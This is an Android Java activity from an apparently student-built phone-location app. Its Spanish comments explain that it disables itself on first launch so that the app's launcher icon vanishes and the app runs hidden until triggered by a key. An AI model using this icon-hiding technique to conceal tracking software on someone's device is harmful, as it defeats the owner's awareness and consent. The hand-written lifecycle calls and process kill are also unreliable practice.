/*
 * Nos interesa que la aplicacin no tenga ningun icono desde la que ejecutarse, pero esto no podemos 
 * hacerlos simplemente no definiendo un icono y actividad principal, ya que los componenetes de la aplicacin
 * como son los services, activities, etc, solo se inicializan cuando una app se ejecuta por primera vez. Es 
 * decir, si en el Manifest no declaramos un icono y una activity principal, no podremos ejecutar la aplicacin
 * cuando usemos la clave.
 * Para evitar esto, creamos una activity principal "InstallActivity", que lo nico que hace al iniciarse es 
 * desactivarse y finalizar. 
 * 
 * Con esta desactivacin desaparece el icono del terminal.
 * 
 */



package com.pfc.localiza;

import android.os.Bundle;
import android.app.Activity;
import android.content.pm.PackageManager;
import android.view.Menu;


public class InstallActivity extends Activity {
	

	

	@Override
	
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);	
		PackageManager p = getPackageManager();
		
	
		//Procedemos a desactivar esta actividad, de forma que no vuelva a ser ejecutable. 
		//En consecuencia, se elimina el icono del escritorio del telfono:
		p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
	
		finish();
		
		}
	
	@Override
	public boolean onCreateOptionsMenu(Menu menu) {
		getMenuInflater().inflate(R.menu.main, menu);
		return true;
	}
	
	
	@Override     
	 protected void onPause() {
		
		 super.onPause();
		 super.onStop();
		 onDestroy();
		
	 }
	@Override  
	protected void onDestroy(){
		
		super.onDestroy();
		android.os.Process.killProcess(android.os.Process.myPid()); 
	}
}